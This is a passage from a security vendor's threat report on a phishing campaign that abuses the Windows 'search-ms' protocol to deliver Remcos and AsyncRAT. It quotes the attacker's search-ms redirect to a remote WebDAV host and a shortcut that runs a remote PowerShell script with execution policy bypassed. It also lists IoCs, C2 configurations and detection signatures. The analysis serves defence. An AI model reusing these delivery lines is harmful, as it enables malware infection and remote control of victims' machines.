or location of the web page. By modifying this property, we can redirect the user to a different location. \n * 'search-ms:query=Review&amp;crumb=location:\\\\\\dhqidfvyxawy0du9akl2ium[.]webdav[.]drivehq[.]com@SSL\\DavWWWRoot&amp;displayname=Search': This is the value assigned to the window.location.href property. It represents the target URL or location where the user will be redirected. \n * search-ms: This is the protocol identifier that signifies the use of the Windows Search protocol\n * query=Review: The \"query\" parameter specifies the search criteria, which in this case is set to \"Review\". It indicates that the search operation will focus on finding items related to the term \"Review\".\n * crumb=location:\\\\\\dhqidfvyxawy0du9akl2ium[.]webdav[.]drivehq[.]com@SSL\\DavWWWRoot: The \"crumb\" parameter defines the location or path constraint for the search. The value \"location:\\\\\\ dhqidfvyxawy0du9akl2ium[.]webdav[.]drivehq[.]com@SSL\\DavWWWRoot\" specifies the specific location or folder path where the search should be performed. \n * displayname=Search: The \"displayname\" parameter sets a custom name for the search query, which in this case is \"Search.\" \n\nPutting it all together, the code sets the window.location.href property to initiate a search operation using the \u201csearch-ms\u201d URI protocol handler. The search will look for items related to \"Review\" within the specified location which here is the remote file server.\n\n### Behind the Click: Understanding User Interaction\n\nOnce the email recipient clicks on the malicious link, \"Open Windows Explorer\" warning typically appears as a clickable button. By clicking on it, the user can navigate to the folder or directory where the files matching the search query are stored.\n\n Figure 5: Warning to Open Windows Explorer \n\n\nIf user allows to Open Windows Explorer, then depending upon the operations to be performed several requests are sent to the server. From Figure 6, we observe the OPTIONS request which is sent to retrieve the available methods and features supported by the server.\n\n Figure 6: Options request \n\n\nFurther we see usage of PROPFIND method, which allows to retrieve metadata or properties associated with a resource or collection on the server. These properties can include information such as the resource's name, size, creation date, modification date, and other custom-defined attributes. This method is used to find items related to the term \"Review\u201d as mentioned in Figure 4 (query=Review). In most cases, the search would start from the root of the directory and the recursive behaviour of the PROPFIND method in retrieving item may vary depending on the server's settings:\n\n Figure 7: PROPFIND method to find items related to term \u201cReview\u201d \n\n\nThe response received for a PROPFIND method on a file in WebDAV is typically an XML-formatted response that contains the requested properties or metadata of the file. The exact structure and content of the XML response may vary depending on the WebDAV server implementation and the specific properties requested. However, the response includes elements and attributes representing the properties of the file.\n\n Figure 8: PROPFIND method response \n Figure 9: XML Format PROPFIND method response \n\n\nOn receiving properties of the shortcut file (Review_200630_DeletedItem.lnk), GET method is used to retrieve the content of the file.\n\n Figure 10: Retrieving shortcut file with GET method \n\n\nBased on the parameters provided in the \u201csearch-ms\u201d query mentioned in Figure 4, Windows Explorer window displays below search result for items related to \"Review\".\n\n Figure 11: Windows Explorer window with the search result \n\n\nFew of the other shortcut files used in this attack is shown in Figure 12. Attacker\u2019s employ various tactics to trick unsuspecting victims, and one such method involves manipulating icons and file names for shortcut files. These deceptive techniques are carefully crafted to exploit human psychology and lure users into interacting with malicious content. By assigning icons that resemble legitimate applications and choosing file names that appear urgent or important, attackers aim to instil a false sense of trust and urgency. Also, each variation of the shortcut file may have a unique signature or fingerprint, making it harder for security tools to identify and block them.\n\n Figure 12: Windows Explorer showing different shortcut files based on search keyword \n\n\nIf the victim clicks on the opened shortcut file, then the malicious DLL file referenced in the command line is executed using the regsvr32.exe utility.\n\n Figure 13: Shortcut file command \n Figure 14: DLL file retrieved using PROPFIND and GET method \n\n\nFor all the network activity, the attacker has employed SSL (Secure Sockets Layer) encryption as a clever tactic to evade network protection measures. By leveraging SSL, they successfully concealed their malicious activities within encrypted traffic, effectively bypassing traditional network security controls. To shed light on the nature of this attack, the captured network traffic has been decrypted for illustrative purposes. This act of decryption allows us to analyse and understand the sophisticated techniques utilized by attackers, providing valuable insights into their strategies, and enhancing our collective knowledge in combating such threats. \n\n## An Alternative Technique: PowerShell-Based Attack Variant\n\nIn this variant, SwiftCopy shortcut file runs the PowerShell executable (powershell.exe) with the following parameters: \n\n * \u2018-ExecutionPolicy Bypass\u2019 to bypass the PowerShell execution policy\n * \u2018-File \\\\\\internetshortcuts[.]link@80\\ePWXBTXU\\over.ps1\u2019 to specify the path to a PowerShell script file named \u2018over.ps1\u2019 located at the given network location. \n\nThe code is designed to run the script without enforcing any execution restrictions, allowing it to execute potentially harmful commands or actions.\n\n Figure 15: Swiftcopy LNK file execution \n\n\nDuring our investigation, we discovered multiple variants of PowerShell files in this campaign, including:\n\n * The \"over.ps1\u201d file that downloads an ISO file, extracts a DLL from it, copies the DLL to a specific directory, registers it using regsvr32.exe, and dismounts the virtual disk.\n * Variants where instead of using the ISO file, PowerShell scripts directly download DLL payload and executes it. \n * PowerShell scripts that trigger the download of a zip file containing an EXE payload.\n * PowerShell scripts that download and execute DLL files, accompanied by the opening of a decoy PDF file to deceive victims.\n * PowerShell scripts that download and execute VBS files. The VBS files execute PowerShell to inject the malicious dll into a legitimate file, accompanied by the opening of a decoy PDF file to deceive victims.\n Figure 16: Variants of PowerShell file used in this campaign \n Figure 17: Dynamic Execution of PowerShell variant using ISO file \n\n\n## Malicious Payloads Unleashed: Remote Access Trojans in Action\n\nIn this campaign, the payloads being downloaded are remote access trojans (RATs), specifically Async RAT and Remcos RAT. RATs are malicious software that enable unauthorized individuals to gain remote control over an infected system. Once a RAT infects a target, it can perform a range of malicious activities, such as stealing sensitive information, monitoring user activity, executing commands, and even spreading to other connected devices. \n\nNotably, the EXE payload of Remcos RAT is null byte injected, a technique employed to evade detection by security products. By injecting null bytes into the executable file, the RAT can bypass security mechanisms that rely on file signatures and patterns, allowing it to operate undetected and increase its chances of successful infiltration and persistence within the compromised system. Trellix has the capability to identify and mitigate such techniques used to bypass detection.\n\n## Evading Detection: A Closer Look at the Range of Files Cunningly Utilized by Attackers\n\nDuring investigation we found that attacker adopted a proactive approach by regularly updating the files. This strategy is deliberately employed to evade detection by security products. By frequently refreshing the files, the attacker aims to circumvent security measures reliant on static signatures or known indicators of compromise.\n\n Figure 18: Multiple html used as initial attack vector found on compromised website \n\n\nWe also discovered multiple file servers controlled by the attacker and these file servers served as repositories for various malicious files and tools. What was even more concerning was that some of legitimate servers lacked proper authentication measures, providing the attacker with unhindered access. This unrestricted access to servers presented a serious security risk, as the attacker could potentially exploit these weaknesses to orchestrate further attacks with relative ease.\n\n Figure 19: Multiple files identified on Attacker\u2019s Server \n\n\nThe potential impact of exploitation can be enormous by utilizing this method because, the intended audience for document-based exploitation might not have a vulnerable version or they might have patched it. However, in this case, the attack was started simply by visiting the URL. \n\nDuring our research, we discovered that the \u201csearch\u201d / \u201csearch-ms\u201d protocol can be executed in multiple ways within HTML files as seen in below figure, revealing its flexibility and potential for exploitation in different scenarios. \n\n Figure 20: Several ways of executing search query in HTML file \n\n\nThreat actors can use the \u201csearch\u201d / \"search-ms\" URI protocol handler to launch attacks using a variety of file types. In our research, we were successfully able to utilize the protocols in different file types, including Batch, PowerShell, Visual Basic, PHP and Office Macro files. By employing this method in Script files, we observed that user would not receive Open Windows Explorer alert seen in Figure 5, thus leading to decrease in user interaction. Because of its adaptability and accessibility, it might be a tactic that other threat actors find appealing. \n\n Figure 21: Execution of search ms query using different file types \n\n\nTo **disable \u201csearch\u201d/ \u201csearch-ms\u201d URI protocol handler**, run below command with administrative privilege: \n\n * reg delete HKEY_CLASSES_ROOT\\search /f\n * reg delete HKEY_CLASSES_ROOT\\search-ms /f\n\n## Conclusion\n\nAs the \u201csearch\u201d / \"search-ms\" URI protocol handler has emerged as a potent initial attack vector, it is crucial to anticipate a potential increase in attacks utilizing this method. It provides threat actors with a convenient means to deliver malicious payloads while evading traditional security defences. To stay safe, users must exercise caution and be wary of untrusted links. It is crucial to refrain from clicking on suspicious URLs or downloading files from unknown sources, as these actions can expose systems to malicious payloads delivered through the \u201csearch\u201d / \"search-ms\" URI protocol handler. By acknowledging the rising trend of attacks leveraging this method and taking proactive steps to mitigate risks, we can enhance our security posture and effectively safeguard against these emerging cyber threats. Together, let us remain vigilant, adaptable, and informed to combat the evolving landscape of cyber-attacks. \n\n## Trellix Product Coverage\n\nTrellix Email Security offers a multi-layered detection strategy for this campaign that includes checks on the URL, email, network, and attachment levels to ensure that any potential threat is discovered and stopped from doing harm to our customers. To remain ahead of new and changing threats, our product continuously monitors and updates its threat intelligence database to stay ahead of new and evolving threats. that includes the Trellix Multi-Vector Virtual Execution Engine, a new anti-malware core engine, machine-learning behaviour classification and AI correlation engines, real-time threat intelligence from the Trellix Dynamic Threat Intelligence (DTI) Cloud, and defences across the entire attack lifecycle to keep your organisation safer and more resilient. \n\n## Trellix Protection\n\nProduct \n\nSignature \n\nEndpoint Security (ENS) \n\nTrojan-FVIY \nHTML/Agent.s \nLNK/Agent.ab \nPDF/Phishing.u \nVBS/Agent.je \n\nEndpoint Security (HX) \n\nGeneric.Exploit.CVE-2022-30190.J.1517B09C \nGeneric.mg.163a08fb103a81ba \nGen:Variant.Mikey.148203 \nMALICIOUS FILE EXECUTION VIA SHARED STORAGE (METHODOLOGY) \nWINDOWS SEARCH PROTOCOL EXPLOITATION (METHODOLOGY) \n\nNetwork Security (NX) \nDetection as a Service \nEmail Security \nMalware Analysis \nFile Protect \n\nFEC_Downloader_HTML_Generic_31 \nFE_Loader_Win64_Generic_148 \nTrojan.Downloader \nFEC_Trojan_LNK_Generic_11 \nPhishing_JS_Downloader \nFE_Trojan_MSIL_Generic_189 \nFE_Trojan_MSIL_Generic_257 \nFE_Backdoor_MSIL_ASYNCRAT_3 \nMalicious ASYNCRAT Indicator \nMalware.Binary.lnk \nMalware.Binary.exe \nMalware.Binary.vbs \n\nHelix \n\n1.1.3858- WINDOWS METHODOLOGY [SearchNightmare - search-ms] \n\n## **MITRE ATT&amp;CK\u00ae Techniques**\n\n**Tactic**\n\n**Technique ID**\n\n**Technique Name**\n\n**Reconnaissance**\n\n[T1589](<https://attack.mitre.org/techniques/T1589>)\n\nGather Victim Identity Information \n\n**Resource \nDevelopment**\n\n[T1586.002](<https://attack.mitre.org/techniques/T1586/002/>) \n[T1586.002](<https://attack.mitre.org/techniques/T1584/001/>)\n\nCompromise Accounts: Email Accounts \nCompromise Infrastructure: Domains \n\n**Initial Access**\n\n[T1566.001](<https://attack.mitre.org/techniques/T1566/001/>) \n[T1566.002](<https://attack.mitre.org/techniques/T1566/002/>)\n\nSpearphishing Attachment \nSpearphishing Link \n\n**Execution**\n\n[T1204.001](<https://attack.mitre.org/techniques/T1204/001/>) \n[T1204.002](<https://attack.mitre.org/techniques/T1204/002/>) \n[T1059.001 ](<https://attack.mitre.org/techniques/T1059/001>) \n[T1059.007](<https://attack.mitre.org/techniques/T1059/007/>) [T1218.010](<https://attack.mitre.org/techniques/T1218/010/>) \n[T1053 ](<https://attack.mitre.org/techniques/T1053>)\n\nUser Execution: Malicious Link \nUser Execution: Malicious File \nCommand and Scripting Interpreter: \nPowerShell \nCommand and Scripting Interpreter: \nJavaScript \nSystem Binary Proxy Execution: \nRegsvr32 \nScheduled Task/Job \n\n**Persistence**\n\n[T1053 ](<https://attack.mitre.org/techniques/T1053>)\n\nScheduled Task/Job \n\n**Defense Evasion**\n\n[T1036.008](<https://attack.mitre.org/techniques/T1036/008/>) \n[T1564.003](<https://attack.mitre.org/techniques/T1564/003/>) [T1497 ](<https://attack.mitre.org/techniques/T1497>) [T1140](<https://attack.mitre.org/techniques/T1140/>) \n[T1218.010](<https://attack.mitre.org/techniques/T1218/010/>) \n[T1055](<https://attack.mitre.org/techniques/T1055>) \n[T1140](<https://attack.mitre.org/techniques/T1140/>)\n\nMasquerading: Masquerade File Type \nHide Artifacts: Hidden Window \nVirtualization/Sandbox Evasion \nDeobfuscate/Decode Files or Information \nRegsvr32 \nProcess Injection \nDeobfuscate/Decode Files or Information \n\n**Discovery**\n\n[T1012](<https://attack.mitre.org/techniques/T1012/>) \n[T1082 ](<https://attack.mitre.org/techniques/T1082>) \n[T1497 ](<https://attack.mitre.org/techniques/T1497>)\n\nQuery Registry \nSystem Information Discovery \nVirtualization/Sandbox Evasion \n\n**Command and Control**\n\n[T1571](<https://attack.mitre.org/techniques/T1571>) \n[T1071](<https://attack.mitre.org/techniques/T1071/>) \n[T1573 ](<https://attack.mitre.org/techniques/T1573>)\n\nNon-Standard Port \nApplication Layer Protocol \nEncrypted Channel \n\n## Indicators Of Compromise (IoCs):\n\n### Hashes\n\n**LNK Files**\n\n485d446c5892b931c0a3a238dca84bebb787052c877deb73f02ae5ee5632de9d \n\na2144301067495656391aaa937e47b27706d7db8ea7fd12412e7796196f91fe8 \n\n31038f7ee74463661addd7378b26076898e20d19e69f672f829af07b8ff816a9 \n\n25f616a8bce8578219bc884a64d1a3bc60ec87f07cdff8da3c386ae5b49445a9 \n\nc91527db707347d7970e8197c8a11446c40d945adfb47eb68f666b02f56d8c22 \n\nd9b56c6bf2c52116855a79e0008b6cfd7baef20e5af06ba142f774c8bf3b7401 \n\nd99ed5b55440cefd33047490937b9b729f6b7a93bcb7d3877d07391fbec2a13a \n\n1b004980738e868605f88d6b764f72d0d6c50fddea3a7bdf4508ff3057501562 \n\n83c8f1d9b27d9e455ad2602b1005f6837ac6040cf61acc3124f7179fd5894d27 \n\nb8998dff4684d815538b1c57c3bba0f9914f8436fde99ddedc1e9b1e658dabcb \n\n0b28a2dcb365ac02b7d6c3928d5a1cfdd5ed669206eb176ab65ebb6084b58545 \n\n9b5c8b82828c0aa94956671b3b9f2a6ec4f34a642d621938e86bffe9ce8b1acb \n\n2da9b5bef5ced856c6367e990dc2bf0424ad2c551016c3f1d2068b9284310e53 \n\n5be46ac9b6fd4d07db8710315b6fa8597464756005235472cf1562a0398921bf \n\ne3d4c11ea01f0b927bac052aa01e246cd2890445d848a7abe4b03882cccaaaf7 \n\n4d8ff026a14c03fc7fce40fe5bb9c287320f66102693e74e40a48247999f4a0a \n\nafff3e377a5c13a9707680ed926c15718eeb2d3b4d9dcf0993019b3766fc16aa \n\nfc226deb01a8d15acf98fd6e9daa3d95b73687f46e9029523fd7e8fe8ad5fb83 \n\nb4bded423c23574c5080f449d7c92c95b7aa480fedb756568d7280db3ec80cf0 \n\n597f58f1ec035d553dc5f5e9e0d0d0ed656a2488f5f93c30bf528278b3d615a1 \n\ned34e71d2fcae823b130a7e54a4404c15e34060e45c73654d16f34c799f91509 \n\n901dd6b7fb5aae90840191eb5e0b8e2578503feaef93fd58b99a3314a2008b4b \n\n6643aba0f5318fe279c1cae871ec32540b65265a68fb98aedae5a6fc0707b3c7 \n\n8a22b626a893ed2bcf9f63ffe5dcb2198f7d5dc991b5cec434e8b0f050ebbfeb \n\nea2c8d68c83a93b4f526d2bdb25aa20920b43b7985b9bb8a8109912b74adf1df \n\na3f5a76a50819ed856e22e690989f4e0b1bf6c88bab3d989868700cafa26c4b7 \n\n09dc1f4a21f9b36a0ceeef791d2bf3463299d172712943139ace33d476d7d7c2 \n\n5b7fdc6714e6e2f7f91a1b895204d630561f1f1431636875f6a270f3db06a55b \n\nf80caed9f1b4d71e61a2869c240206f55c44fb9075d4da283df0bcedf7a11d3a \n\n90202f38f8c813d2e09063432542573e3e7792b9111f2c56d12a451c9dd25b48 \n\n47097f706f72ac8979bfd846d779f3c520f47241b83563dbbcf0e4df94805a21 \n\nbbaf94b8be1c355328e5db962577b26ae73f9c3fbf81e6892019bffbf0513698 \n\nd626716fe7b26f3299438cca864216c3dacadaba145ce2decc2eededb3d4bf38 \n\n40f99a875efa382cc0cae003c7b3b0519a7fcaa10a95989103b1e3e2bb20832a \n\n52cebb58ec92cf411ea8482502d8aea3580ded02edc1482609283e0dff541dec \n\n437b82a5533485ce26a8b983cffa787e629120422e49b28a2608337158c883fc \n\n84d9b5159f937e5f1c98e221d23546fb38775097e983fb660144b4d4a8955582 \n\nc519d06e252a1cf04f8fb38f20c76a39363e51bf31864bac638f662a698b244e \n\n5d7e304d77bedb970a1c9a5b3aa6f5c4252825c9c0a94fe60ec56a0f1b2664b5 \n\n1598486e69f94e221dcbd02b10bb33352baf5886db9c06475470159ab16eadbd \n\n923c2a87d2321c3fb172d8998574f4d2695e6c8f5f5d5d568c26aefb5fe2d198 \n\na531edd712eb0beabe14cb4e9ff91dc7635b743e71b6fdc20ec4c0247eccff62 \n\n7c1aa45ce5d254ffaefea8396128a55318bf937fbb3400b327f5dc528134730d \n\nf4b055a61d096e2f111bdaf7b171719188c02d74fa946dabdae0bbc72671d2db \n\n58addf5e77b1dd45ead377c2a8d52b12a0db4edbc607f17b650c27428e24bbfd \n\n964f9489714241afd3c422eb164fe96dfe72c12ab1d3f58613694f73bc7e839e \n\n5a47b18066d8dcd0fbc524f529002cf0a270d8394de928e8426fa06959a82704 \n\n388f736c54cb1e57d5877d35da5ecdcf46b88ad2e44ca5d2ecffa0dcf0e1b8d9 \n\n4daafeb8ae95460be3ef93577983db33cca28ecb67fff9b958a7f71ae17504bf \n\n**DLL Files**\n\nd6fcf0bcebcac7aa5e7b21b189dbd89f314f79871b770911a7d7b780207fb83d \n\nd0b0f7842587afe7e23fc0218fd0a391996e72b1a804a6bfc33e97d9aecb6b2e \n\nf21010eb8c0f2fd23c4ee941a394853597bfb90527f43f3c61bf6ce004b7f367 \n\na9f132dc514d4598a29d004a38e71d3a389e43b46149a36314d2f55e20e1ebb6 \n\nfad17294a3fd687d75f49040c837af39ca2bb9ea84e022aa750e81ddc4cd1583 \n\n811bba52ccee8ee0dce9f96f402a7c33427622276028bfb5e9d661130fa0e3fc \n\n45cd3d4ec91bf68bc975d99d90612e459aeb4a0f31321a440d7d41fcdea798f3 \n\n72a79351d602ce6a1d0267bcd6d57c17cd8adc44c78197138cc3be5f4100b5b6 \n\nb5b3747f8b0d11b5217a7a39c2420fb5a0c1044c82cbe9cba596dacf521a1a01 \n\n19e75218473b112e65cec4c2c5afd0c3cc6b4fb8f847127018e0815bd64b6480 \n\nfe6a8beb35f9550615cb3190b1b207bbe11c23a16248644c09ba0d007822c132 \n\nf493a5a65d460bd53b05fde1ee5562db08e52c34989321a9bd09ecc5dc3f4d6d \n\n41960d1cd749289ff40a1c92970706ead76f73fb3b61276a2f34a7ac38f989c6 \n\nde0a1c35121a6e08bf07267aca78fb8fe9c46ead95ed1acebfb3a77b72e869b8 \n\nf80553b2b50775cdad4c40529b4fb9461b1758a6007edd7c22df09238885201 \n\n3dfc781c1b656925b91a22b48b85b6ce2bf8f9cb9c1288be6ec3b760f6f7402d \n\n188baeb6bf2b009adc2efb648b068be71d5b55d1d11e000c473b429f3dda4a86 \n\nf2c577360fbf36859eeb194970f734810f2954493e5428d71add4edb6c11c4f1 \n\n15f8dd0880d76be36de65dd8412d7171d2cc00c35d3461452dfdae2f657aaf31 \n\n2b84ab32982a3f9cc03dd4f020751dcaaf8ad5ef32d0e7975a0b1d17045ee07e \n\n7316651d2e38599d6e46a1ac52dff4eee7ae16f22e87cd244efb9a6ed748f358 \n\n0764a24f94d829a625cca37f92863a84553db77469b68eadf875e73fcf0d3036 \n\n**HTML Files**\n\n9851dbd8a7e9b52e6745b7fb2ff854ce573d4a56be0cd0b700a30eca15e331e5 \n\n**PDF Files**\n\nbd33b3aa897df0702913dbecd5ad2f7e63df11f4c2a7e461dad7f89abe218a45 \n\n540744100c8a0eba6c4d24fcee5df40a274ecd51f33c41e11dbe482bd32d271d \n\n7a69202cb54dd828736d63dae6b948fcef815658859f1d10220727d242eb6fd4 \n\n776d7ce582c1e3af65b60073986c78da394cbbab1bf6b83a6c0d736c58d33758 \n\n1c450bca78ecf77fc5c9b03ced93f5410f03804fcbf17c9c5e584770eec03403 \n\nb26144c6e42601f1f1be09ece7c7fcb127637db3b953065648d1b1f371da7e8a \n\nf0f932c136c2d34b0f9da7a83e1a2f87063ea2bce48d3a9af004189bf49d98d9 \n\n98ab2fc44063d4e00f221e502419d9cca598fafb9e1e00352149327267604bc1 \n\n6e7f4d594ee4f5d5f08321ede7c32e51d72acbd0700f37c621f9145d8c86309d \n\n904343ba2502d390b36403181e77192a62f31e98c87eb91906fbae27019b4c0d \n\n3d87877bfb6da476da1f51410416bef22cc216d941c79268f6de17d8dde1c0b8 \n\n**Powershell Script**\n\nc2f10c9556eecd1ffe67e763190c630262dfdb593245357283b02df2b4d696de \n\n5c31f5cfa003b1f745eb5019d76aa43f06a7d46c6403eeb2deabd44ee1a1a97a \n\n4c1cb32e0a142d55997a55bfc239e4b5b31a6e021014d023d5ff9787948490df \n\n4f8ba8eec38e117fa323bc24074993a7f1cc31c5ce112f9c6696c724628f53dc \n\ndd28b5740c0fb2890a7579d75c65cf09a36ba5d9fc5df5c9581771e40420f35b \n\n56a2692cbde566ca149ef196f9bf4f843839f36ebfdb8acd47acaf2cd01703e9 \n\n9466d718154c26b8d003b99faff2a8868e2a26788e2946b68245e6dfe54da610 \n\nc1cae7181fab03d16c8e10dbe0993319dca6597e2a2f28ba07014d64f996a1fa \n\nce3cfcc3cd86936aff5d43de6f0298cc8f0c5cfd7675d951dd23de53c3b8b154 \n\nc8c5386fef1b6e45e02323f3a45b1e73b5d5be60a8a5f5ebe3b95bce77b03167 \n\n88aeb09dcc59858c9969b7ae1e0e2b58f0aa90b2d27a5edfe9cd82e602ed5952 \n\n**VBS File**\n\nf214a42d57e88b6d77b036934cf93fb9c9126335925bdafc9bb8a326abe2d652 \n\n4867eebb0f6bca553c7d50e878e3cb19f7471c1c89cbd85f49b6d50f7a44e779 \n\n**ISO File**\n\ncef2c8a040fe4d27843f601b76c13169fcc0f1d5c7f20e71e830967dffa89baa \n\n**ZIP File**\n\nc7bdce98567809f96907d5a005ae7ff8295c63b9d93aa2a9846f903d688fd657 \n\n**EXE File**\n\n19cd76a94c55380cc6b053b05eb8896fa1329f03d65a7937225196c356bb0c6a \n\n**ASYNCRAT From Memory**\n\ndb27ba01238ce49683b68bc9c2b925caac6008ae178d14c0dce4cce161bde746 \n\n### Domain/Host/URLs\n\ndhqidgnmst61lc8gboy0qu4[.]webdav[.]drivehq[.]com \n\ndhqidlu10mna2tuk2qfoaew[.]webdav[.]drivehq[.]com \n\ndhqid9pjapv63d8xvji8g4s[.]webdav[.]drivehq[.]com \n\ndhqidvjn6bfvi00cb0834a3[.]webdav[.]drivehq[.]com \n\ndhqidvdosqx8tu0vq1h1d1g[.]webdav[.]drivehq[.]com \n\ndhqidctjo3ugevk9u5sev1r[.]webdav[.]drivehq[.]com \n\ndhqido7gy8hiehwprjhli16[.]webdav[.]drivehq[.]com \n\ndhqidfvyxawy0du9akl2ium[.]webdav[.]drivehq[.]com \n\ndhqidee98lja03f52atdmii[.]webdav[.]drivehq[.]com \n\ndhqid5neul4wc9w74pynlrs[.]webdav[.]drivehq[.]com \n\ndhqidqot3k8sh7ve2ns9nry[.]webdav[.]drivehq[.]com \n\ndhqidoakoljbb9jnbssiau2[.]webdav[.]drivehq[.]com \n\ndhqidlnsxx2qigisdvn7x2f[.]webdav[.]drivehq[.]com \n\ndhqidwhws4rkw80f312lkpm[.]webdav[.]drivehq[.]com \n\ndhqidhhva53s2qvmxwxtkrm[.]webdav[.]drivehq[.]com \n\ndhqid3b4b9u6ecv6jcxva0f[.]webdav[.]drivehq[.]com \n\ndhqid45r064utd5gygt2jy6[.]webdav[.]drivehq[.]com \n\ndhqidhx2c2f2oc8lccg38tx[.]webdav[.]drivehq[.]com \n\ndhqidvooruijtwg0lyucl5s[.]webdav[.]drivehq[.]com \n\ndhqidk9oi3yuhf43sb05xgn[.]webdav[.]drivehq[.]com \n\nbalkancelikdovme[.]com \n\npdf-readonline[.]website \n\nhxxps://designwebexpress[.]com/Invoice_3211.html \n\nhxxps://designwebexpress[.]com/Invoice[.]html \n\nhxxps://designwebexpress[.]com/Invoice_3221[.]html \n\nhxxps://designwebexpress[.]com/Invoice_4221[.]html \n\nhxxps://transfer[.]sh/get/Ja9CVWbDzf/invoice[.]zip \n\nhxxp://internetshortcuts[.]link/VdXiIRQo/payload[.]iso \n\nhxxps://efghij[.]za[.]com/Invoice_662243[.]html \n\nhxxps://bridgefieldapartmentsapp[.]ie/EX \n\nhxxps://efghij[.]za[.]com/Invoice_898277[.]html \n\nhxxps://bridgefieldapartmentsapp[.]ie/EX/index[.]html \n\nhxxps://www[.]cttuae[.]com/ems/page[.]html \n\nhxxps://chemaxes[.]com/Invoice-Payment[.]html \n\nhxxps://fashionstylist[.]za[.]com/Invoice_82637[.]html \n\nhxxps://reasypay[.]sa[.]com/Invoice5691[.]html \n\nhxxps://lfomessi[.]za[.]com/home[.]html \n\nhxxp://172[.]245[.]244[.]118/home[.]html \n\nhxxp://172[.]245[.]244[.]118/Quote[.]html \n\nhxxps://cargopattern[.]shop/page[.]html \n\nhxxps://efghij[.]za[.]com/Invoice_72638[.]html \n\nhxxps://fashionstylist[.]za[.]com/Invoice_898277[.]html \n\nhxxps://fashionstylist[.]za[.]com/Invoice_0020317[.]html \n\nhxxps://landtours[.]rs/BB/index[.]html \n\nhxxps://www[.]shorturl[.]at/asAFO \n\nhxxps://shorturl[.]at/asAFO \n\nhxxps://cargopattern[.]shop/home/home[.]html \n\nhxxps://bridgefieldapartmentsapp[.]ie/home[.]html \n\nhxxps://designwebexpress[.]com/Invoice_6211[.]html \n\nhxxps://designwebexpress[.]com/Invoice_5221[.]html \n\nhxxp://seductivewomen[.]co[.]uk/invoice44201[.]html \n\n### Remcos Configuration\n\nHosts: gainesboro[.]duckdns[.]org:30277 \n\nBotnet: QB-1 \n\nConnect_interval: 1 \n\nInstall_flag: False \n\nInstall_HKCU\\\\\\Run: True \n\nInstall_HKLM\\\\\\Run: True \n\nInstall_HKLM\\\\\\Explorer\\\\\\Run: 1 \n\nInstall_HKLM\\\\\\Winlogon\\\\\\Shell: 0 \n\nSetup_path: %LOCALAPPDATA% \n\nCopy_file: remcos.exe \n\nStartup_value: True \n\nHide_file: False \n\nMutex_name: pqowndhk-KEQR6K \n\nKeylog_flag: 1 \n\nKeylog_path: %LOCALAPPDATA% \n\nKeylog_file: logs.dat \n\nKeylog_crypt: False \n\nHide_keylog: False \n\nScreenshot_flag: False \n\nScreenshot_time: 5 \n\nTake_Screenshot: True \n\nMouse_option: False \n\nDelete_file: False \n\nAudio_record_time: 5 \n\nAudio_path: %ProgramFiles% \n\nConnect_delay: 0 \n\nCopy_dir: Remcos \n\nKeylog_dir: Mozila \n\n### AsyncRAT Configuration\n\nC2 \n\n79.110.49.162, 111.90.150.186 \n\nPorts \n\n6606,7707,8808, 8753,8977,9907 \n\nBotnet \n\nDefault \n\nVersion \n\n0.5.7B \n\nAutoRun \n\nfalse \n\nMutex \n\nAsyncMutex_6SI8OkPnk \n\nInstallFolder \n\n%AppData% \n\nBSoD \n\nfalse \n\nAntiVM \n\nfalse \n\nCert1 \n\nMIIE8jCCAtqgAwIBAgIQAI5BDBpeCTNsOSTXCKCKpTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjMwNjI0MDAxODQ4WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBALa46FJI8u/4jUwxfEcHQEDPGroGAEzlJsx1nSk5/L2JCWHSqdWOhEtoUMp1QsLxbTaq5IiN28rGy/6oOxzAmxyk1lK+z/haGBu3w9ae8JAsgAM2v2ClGBL67/lgeO7h5AYeCUpxitXGTCdhnMyeR9O+g94lidCbp6Y/Rbj3Wdu5nzSURFEPdkW3t6/jAVdRH+VuFqmOs0SSe71W+J1Ltnby65MkMb0p2q0BZV8YhSEsSD+yC/ilOdyCKLa70PXyl25vPmV0+VZxV/gOZY+wdsMHJiBvRX+fGuLRNK0Ti8J7yZMONPGS/NmhwkE4Kx/WMvC1Af1syI/2u1cbLRrna/NtPejXgpzz9TV5B04pWbLpT4BV6MgUsjkV4akmXEf6mK+veI2FjVdmCWpujmppt5WG40ay1y8YRJD/QxHfMbqJocFp+9jRGamhXAAj2PQK63GA8Iz9OCzggD0tqG01Wz90z70ooIz2DrHETXSzgpgTRwbTJG4KmwZTWUUTEXXZsJhKBOOWDaqazbA3wxxea6vdXsx2wpf82LFliEpFdMdDHNEiblpLYWD1dtEw4ehIcMpZUm/Ua4DB/OGlARm/NA+/TBxemlcfgblyPVxBn++f+mkoHHW5+0Or9SqMhY/74s8zgOFYp1cTZG97ZD5jgaNVrFPHFUtnZPfLTV8BG/mRAgMBAAGjMjAwMB0GA1UdDgQWBBScePgUNtG8SPP55ahFlKPcwH7PuTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQBKbdjP6gzZShADcF6siolFE0OpO+vWwVSOdKv/lMxW4mscBZhHZeCrwe3tZjGW3HTAx2wZikSU3SjC9XL/Ei/FqIvP5WubvtshCGMuXIf4aQkkWtzq0Ts1J0XZLtC6fKCoilYq0rNrTn6PRuOnwY4sTN0MlULtZJu1PqRP9YeFWYwMzwZ02FalqnjkOSQ/1y5j11P7SSnJTPNk2/+5Sba0b8qlVPj0CZ7kPxwNqKAOOyC5Q4sqCvS7F7W91WLif7l6PjDoDqk3bdFvrvT7bIFew7o1ZjORYpq+iOPdoybFkyawSEtVgxeJUQ/tV+qM72avws7BugxxVNL4ZCYb69e4spdSH1rwf8w40l4fBMJ5HhFS3erEbRij8FmbSK/78miQaimrSqiS0FG+kFm1paOWdIsZYYhR8sq/ALccUG5ju3cI9q46gt5hIk66TY8LMJtzQc2tyMsge3lodnl9l66Fo1HuW5tgSQ5ntx/Fog9G6qYFvCHsGH7FMkwCMppiyYoYa4+TghvqSmeaCurjjIYex/GXFMOTyU7lmPDfDpZpTMEU54qw19A95T0O49DIzN5U7I8OGdm5/uCBSvaK33KzwTfxgfROQbZR8ZJ/Rm5RBbz6HdAk1io2Bu9+S0VKXPMzcYguSQ8sLJt+G6W3HbAtYWM9DOFlR2ajiW/ULKq9QA== 